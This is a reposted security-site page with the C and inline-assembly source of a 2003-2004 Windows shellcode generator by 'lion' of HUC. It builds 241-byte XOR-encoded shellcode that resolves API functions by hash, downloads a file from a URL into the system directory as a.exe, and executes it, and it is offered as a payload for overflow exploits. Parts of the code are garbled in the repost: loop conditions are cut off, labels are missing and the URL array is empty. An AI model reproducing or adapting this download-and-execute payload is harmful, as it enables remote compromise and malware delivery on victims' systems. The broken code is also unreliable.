Download file and exec shellcode 241 bytes

admin 2021年4月3日18:56:27评论39 views字数 10812阅读36分2秒阅读模式

* downloadurl_v31.c - Download file and exec shellcode for Overflow exploit
* Copyright (C) 2000-2004 HUC All Rights Reserved.
* Author   : lion
*          :
* Date     : 2003-08-15
*          :
* Update   : 2004-05-05 v3.1
*          : 2004-01-08 v3.0
*          : 2003-09-10 v2.0
*          : 2003-08-15 v1.0 
*          :
* Tested   : Windows 2000/Windows XP/windows 2003
*          :
* Notice   : 1. 通过peb取得kernel32.dll地址。
*          : 2. 通过函数的hash值来进行比较,代替GetProcAddress取得函数地址,节省函数名占用的空间。
*          : 3. 利用循环获取hash值和函数地址,节省空间。
*          : 4. 下载url文件并执行。
*          : 5. 用vc6可以命令行直接编译,方便修改。
*          : 6. win2000/winxp/win2003 下测试成功。
*          : 7. 比较小巧,长度为241 bytes。
*          :
* Complie  : cl downloadurl_v31.c
*          :
* Reference:
*          :


#pragma comment(lib, "ws2_32")

// Use for find the ASM code
#define PROC_BEGIN                     __asm _emit 0x90 __asm  _emit 0x90
                                       __asm _emit 0x90 __asm  _emit 0x90
                                       __asm _emit 0x90 __asm  _emit 0x90
                                       __asm _emit 0x90 __asm  _emit 0x90
#define PROC_END                       PROC_BEGIN
#define SEARCH_STR                     "x90x90x90x90x90x90x90x90x90"
#define SEARCH_LEN                     8
#define MAX_SC_LEN                     2048
#define HASH_KEY                       13

// Define Decode Parameter
#define DECODE_LEN                     21
#define SC_LEN_OFFSET                  7
#define ENC_KEY_OFFSET                 11
#define ENC_KEY                        0x99

// Define Function Addr
#define ADDR_LoadLibraryA              [esi]
#define ADDR_GetSystemDirectoryA       [esi+4]
#define ADDR_WinExec                   [esi+8]
#define ADDR_ExitProcess               [esi+12]
#define ADDR_URLDownloadToFileA        [esi+16]
//#define ADDR_URL                       edi

// Need functions
unsigned char functions[100][128] =        
{                                           // [esi] stack layout
    // kernel32 4                           // 00 kernel32.dll
    {"LoadLibraryA"},                       //    [esi]
    {"GetSystemDirectoryA"},                //    [esi+4]
    {"WinExec"},                            //    [esi+8]      
    {"ExitProcess"},                        //    [esi+12]
    // urlmon  1                            // 01 urlmon.dll
    {"URLDownloadToFileA"},                 //    [esi+16] 
// Shellcode string
unsigned char  sc[1024] = {0};

unsigned char url[]=

// ASM shellcode main function
void    ShellCode();

// Get function hash
static DWORD __stdcall GetHash ( char *c )
    DWORD h = 0;
    while ( *c )
        __asm ror h, HASH_KEY
        h += *c++;
    return( h );

// Print Shellcode
void PrintSc(unsigned char *sc, int len)
    int    i,j;
    char *p;
    char msg[6];
    //printf("/* %d bytes */n", buffsize);
    // Print general shellcode
    for(i = 0; i
        //printf("x%.2X", sc[i]);
        sprintf(msg, "x%.2X", sc[i] & 0xff);

        for( p = msg, j=0; j
                printf("%c", _tolower(*p));
                printf("%c", p[0]);

void Make_ShellCode()
    unsigned char  *pSc_addr;
    unsigned int   Sc_len;
    unsigned int   Enc_key=ENC_KEY;
    unsigned long  dwHash[100];
    unsigned int   dwHashSize;

    int i,j,k,l;
    // Get functions hash
    printf("[+] Get functions hash strings.rn");
    for (i=0;;i++)
        if (functions[i][0] == 'x0') break;

        dwHash[i] = GetHash((char*)functions[i]);
        printf("t%.8Xt%sn", dwHash[i], functions[i]);
    dwHashSize = i*4;

    // Deal with shellcode
    pSc_addr = (unsigned char *)ShellCode;
    for (k=0;k
        if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0)
    pSc_addr+=(k+SEARCH_LEN);               // Start of the ShellCode
    for (k=0;k
        if(memcmp(pSc_addr+k,SEARCH_STR, SEARCH_LEN)==0) {
    Sc_len=k;                               // Length of the ShellCode
    memcpy(sc, pSc_addr, Sc_len);           // Copy shellcode to sc[]

    // Add functions hash
    memcpy(sc+Sc_len, (char *)dwHash, dwHashSize);
    Sc_len += dwHashSize;

    // Add url
    memcpy(sc+Sc_len, url, sizeof(url)-1);  
    Sc_len += sizeof(url)-1;

    // Print the size of shellcode.
    printf("[+] %d + %d + %d = %d bytes shellcoden", DECODE_LEN, Sc_len-DECODE_LEN-sizeof(url)+1, sizeof(url)-1, Sc_len);

    // Print the ip/port offset
    for(k=0; k
        if(sc[k] == 0x00 && sc[k+1] == 0x35)
            printf("/* port offset: %d + %d = %d */rn", k-DECODE_LEN, DECODE_LEN, k);
        if(sc[k] == 0x7F && sc[k+3] == 0x01)
            printf("/* ip offset: %d + %d = %d */rn", k-DECODE_LEN, DECODE_LEN, k);

    for(i=DECODE_LEN; i
       sc[i] ^= Enc_key;

    // Print shellcode
    //PrintSc(sc, Sc_len);

    // Deal with find the right XOR byte
    for(i=0xff; i>0; i--)
        l = 0;
        for(j=DECODE_LEN; j
            if (
                   ((sc[j] ^ i) == 0x26) || //%
                   ((sc[j] ^ i) == 0x3d) || //=
                   ((sc[j] ^ i) == 0x3f) || //?
                   ((sc[j] ^ i) == 0x40) || //@
                   ((sc[j] ^ i) == 0x00) ||
                   ((sc[j] ^ i) == 0x0D) ||
                   ((sc[j] ^ i) == 0x0A)
                )                           // Define Bad Characters
                l++;                        // If found the right XOR byte,l equals 0
        if (l==0)
            Enc_key = i;
            //printf("[+] Find XOR Byte: 0x%02Xn", i);
            for(j=DECODE_LEN; j
                sc[j] ^= Enc_key;

            break;                          // If found the right XOR byte, Break

    // Deal with not found XOR byte
    if (l!=0)
        printf("[-] No xor byte found!rn");

    // Deal with DeCode string
    *(unsigned char *)&sc[SC_LEN_OFFSET] = Sc_len;
    *(unsigned char *)&sc[ENC_KEY_OFFSET] = Enc_key;

    // Print decode
    printf("/* %d bytes decode */rn", DECODE_LEN);
    PrintSc(sc, DECODE_LEN);

    // Print shellcode
    printf("/* %d bytes shellcode, xor with 0x%02x */rn", Sc_len-DECODE_LEN, Enc_key);
    PrintSc((char*)sc+DECODE_LEN, Sc_len-DECODE_LEN);
    printf("[+] download url:%sn", url);

void main()
    DWORD    addr;
    WSADATA        wsa;

    addr = (DWORD)≻

        jmp addr


// ShellCode function
void ShellCode()
        PROC_BEGIN                          // C macro to begin proc
// DeCode
        jmp     short decode_end
        pop     ebx                         // Decode start addr (esp -> ebx)
        dec     ebx
        xor     ecx,ecx
        mov     cl,0xFF                     // Decode len
        xor     byte ptr [ebx+ecx],0x99     // Decode key
        loop    decode_loop
        jmp     short decode_ok

        call    decode_start

// ShellCode
        jmp     sc_end
        pop     edi                         // Hash string start addr (esp -> edi)

        // Get kernel32.dll base addr
        mov     eax, fs:0x30                // PEB
        mov     eax, [eax+0x0c]             // PROCESS_MODULE_INFO
        mov     esi, [eax+0x1c]             // InInitOrder.flink
        lodsd                               // eax = InInitOrder.blink
        mov     ebp, [eax+8]                // ebp = kernel32.dll base address

        mov     esi, edi                    // Hash string start addr -> esi
        // Get function addr of kernel32
        push    4
        pop     ecx
        call    GetProcAddress_fun
        loop    getkernel32

        // Get function addr of urlmon   
        push    0x00006e6f
        push    0x6d6c7275                 // urlmon
        push    esp
        call    ADDR_LoadLibraryA          // LoadLibraryA("urlmon");
        mov     ebp, eax                   // ebp = urlmon.dll base address
        push    1
        pop     ecx

        call    GetProcAddress_fun
        loop    geturlmon
        call    GetProcAddress_fun

        // url start addr = edi
        sub     esp, 0x20
        mov     ebx, esp
        push    0x20
        push    ebx
        call   ADDR_GetSystemDirectoryA     // GetSystemDirectoryA
        // eax = system path size
        // URLDownloadToFileA url save to a.exe
        mov     dword ptr [ebx+eax], 0x652E615C           // "a.e"
        mov     dword ptr [ebx+eax+0x4], 0x00006578       // "xe"
        xor     eax, eax
        push    eax
        push    eax
        push    ebx                         // %systemdir%a.exe
        push    edi                         // url
        push    eax
        call    ADDR_URLDownloadToFileA     // URLDownloadToFileA
  mov     ebx, esp
  push    eax
  push    ebx
  call    ADDR_WinExec                // WinExec(%systemdir%a.exe);

        //push    1
        call    ADDR_ExitProcess            // ExitProcess();

        push    ecx
        push    esi
        mov     esi, [ebp+0x3C]             // e_lfanew
        mov     esi, [esi+ebp+0x78]         // ExportDirectory RVA
        add     esi, ebp                    // rva2va
        push    esi
        mov     esi, [esi+0x20]              // AddressOfNames RVA
        add     esi, ebp                    // rva2va
        xor     ecx, ecx
        dec     ecx

        inc     ecx
        add     eax, ebp
        xor     ebx, ebx
        movsx   edx, byte ptr [eax]
        cmp     dl, dh
        jz      short find_addr
        ror     ebx, HASH_KEY               // hash key
        add     ebx, edx
        inc     eax
        jmp     short hash_loop
        cmp     ebx, [edi]                  // compare to hash
        jnz     short find_start
        pop     esi                         // ExportDirectory
        mov     ebx, [esi+0x24]             // AddressOfNameOrdinals RVA
        add     ebx, ebp                    // rva2va
        mov     cx, [ebx+ecx*2]             // FunctionOrdinal
        mov     ebx, [esi+0x1C]             // AddressOfFunctions RVA
        add     ebx, ebp                    // rva2va
        mov     eax, [ebx+ecx*4]            // FunctionAddress RVA
        add     eax, ebp                    // rva2va
        stosd                               // function address save to [edi]
        pop     esi
        pop     ecx
        call sc_start
        PROC_END                            //C macro to end proc

// [2004-10-25]

文章来源于 file and exec shellcode 241 bytes

相关推荐: 【文章】第九章 算法类型和模式 分组密码法

第九章 算法类型和模式     对称密码算法有两种基本类型:分组密码和序列密码。分组密码算法是在明文分组和密文分组上进行运算——通常分组长为64比特,但有时更长。序列密码算法作用在明文和密文数据流的1比特或1字节上,有时甚至是一个32比特的字。利用分组算法,相…

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  • 本文由 发表于 2021年4月3日18:56:27
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                   Download file and exec shellcode 241 bytes


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